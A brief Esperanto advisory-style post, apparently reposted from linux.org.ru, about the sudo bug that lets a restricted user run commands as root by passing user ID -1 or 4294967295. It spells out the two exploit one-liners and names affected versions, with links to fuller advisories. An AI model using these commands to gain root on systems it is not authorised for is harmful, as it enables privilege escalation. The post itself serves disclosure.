Cimo en sudo permesas al iu ajn rulebla dosiero esti ekzekutita kiel radiko se /etc/sudoers permesas ĝin esti efektivigita kiel aliaj uzantoj kaj estas malpermesita por radiko.
Ekspluatado de la eraro estas tre simpla:
sudo -u#-1 id -u
aŭ:
sudo -u#4294967295 id -u
La cimo ĉeestas en ĉiuj versioj de sudo antaŭ 1.8.28
Detaloj:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
fonto: linux.org.ru